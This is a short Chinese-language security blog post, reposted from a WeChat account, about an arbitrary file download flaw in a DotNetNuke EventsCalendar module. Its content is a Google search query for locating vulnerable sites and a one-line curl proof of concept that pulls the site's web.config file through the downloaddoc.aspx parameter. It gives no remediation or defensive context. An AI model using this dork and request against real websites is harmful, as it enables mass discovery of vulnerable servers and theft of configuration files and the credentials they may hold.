CTF导航 CTF导航

DotNetNuke1.x 文件下载漏洞

渗透技巧 2年前 (2021) admin
854 0 0


Google

intext:''Copyright 2019 by Associated Builders and Contractors''inurl:''/desktopmodules/eventscalendar/'


POC:


curl "<site>/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config"


DotNetNuke1.x 文件下载漏洞


原文始发于微信公众号(Khan安全攻防实验室):DotNetNuke1.x 文件下载漏洞

版权声明:admin 发表于 2021年12月13日 上午5:41。
转载请注明:DotNetNuke1.x 文件下载漏洞 | CTF导航

相关文章

对ZDI公布的InfraSuite Device Master一揽子漏洞的分析
admin
568
小众内存分析工具之–Redline
admin
1,550
为了–force-pivoting参数,我问候了sqlmap开发者
admin
310
CVE-2016-7255提权漏洞学习笔记
admin
339
OSMR受験記
admin
885
每日安全动态推送(04-14)
admin
432

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

EvilGophish’s Approach to Advanced Bot Detection with Cloudflare Turnstile
0
CreateRCE — Yet Another Vulnerability in CreateUri
0
BGPWatch — BGP路由分析和诊断平台
0
进程命令行参数欺骗
0
内容劫持 | Electron 安全
0
凭据获取之浏览器
0
实战环境中的Redis 延时注入
0
每日安全动态推送(4-18)
0
漏洞挖掘 | DreamerCMS RCE (CVE-2024-3311)
0
Weblogic RCE(CVE-2024-21006)
0